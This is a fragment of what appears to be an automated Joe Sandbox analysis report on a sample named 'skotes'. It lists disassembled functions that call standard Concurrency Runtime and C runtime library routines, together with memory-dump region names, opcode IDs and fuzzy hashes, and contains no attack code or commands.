                                                                                                                                                                • Instruction Fuzzy Hash: F941C2B09016059FDB21EF64C944B5ABBF8FF14720F0045BAE91AD77A0EB35EA05CB91
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BADB64
                                                                                                                                                                  • Part of subcall function 00BA8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00BA8F50
                                                                                                                                                                • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00BADBC3
                                                                                                                                                                • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00BADBE9
                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00BADC56
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1091748018-0
                                                                                                                                                                • Opcode ID: ed770382cfb9f88730cb89880fe6a381ff49a9c67791c850fd9301ece7611ea7
                                                                                                                                                                • Instruction ID: c832446330c62436e30eedf28f89c2f942486cad98a16484ae46aeaddf61b233
                                                                                                                                                                • Opcode Fuzzy Hash: ed770382cfb9f88730cb89880fe6a381ff49a9c67791c850fd9301ece7611ea7
                                                                                                                                                                • Instruction Fuzzy Hash: E541D270608210ABCF19AB24C896BADBBF5EF46320F0440D9E5079B782DF70AD45C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00BA56F2
                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00BA5726
                                                                                                                                                                • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00BA578B
                                                                                                                                                                • SafeRWList.LIBCONCRT ref: 00BA579A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 893951542-0
                                                                                                                                                                • Opcode ID: a7b544b9e10318d5654725a5f35235f9512f4efd2ea55be67b2176f218d972c4
                                                                                                                                                                • Instruction ID: b56fadaeb29eccebdf2a4afefb620e16ec4dbf273f64003f548ec7842692b085
                                                                                                                                                                • Opcode Fuzzy Hash: a7b544b9e10318d5654725a5f35235f9512f4efd2ea55be67b2176f218d972c4
                                                                                                                                                                • Instruction Fuzzy Hash: A131F8367056149FDF159F20C881BADB7E6EFC6710F1481B9E90AAB355DF306D058790
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00BA2D0F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3433162309-0
                                                                                                                                                                • Opcode ID: 831e09b33a30e144b0e3e2e46406ab3530d4a91ed61e16215c8304a8b72c6bfa
                                                                                                                                                                • Instruction ID: 5d6bea98ade6ee7605e096fec04c0c23012cd6bc9ef045421d7c2e2e11abdb3a
                                                                                                                                                                • Opcode Fuzzy Hash: 831e09b33a30e144b0e3e2e46406ab3530d4a91ed61e16215c8304a8b72c6bfa
                                                                                                                                                                • Instruction Fuzzy Hash: C0313875A04309DFCF14EF98C9C0AAEBBF9EB46310F1404EAD941AB346D730A945DBA0
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00BB13FC
                                                                                                                                                                • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00BB1447
                                                                                                                                                                • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00BB147A
                                                                                                                                                                • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00BB152A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2092016602-0
                                                                                                                                                                • Opcode ID: 70b2b457138247b1d4ae5f1a453a102399d32cb0f42e469fd27681421a5041a0
                                                                                                                                                                • Instruction ID: 2453d08938f43a5da0f41a470527e1440f9bee8c63c9ebe146da1cadde72c3e2
                                                                                                                                                                • Opcode Fuzzy Hash: 70b2b457138247b1d4ae5f1a453a102399d32cb0f42e469fd27681421a5041a0
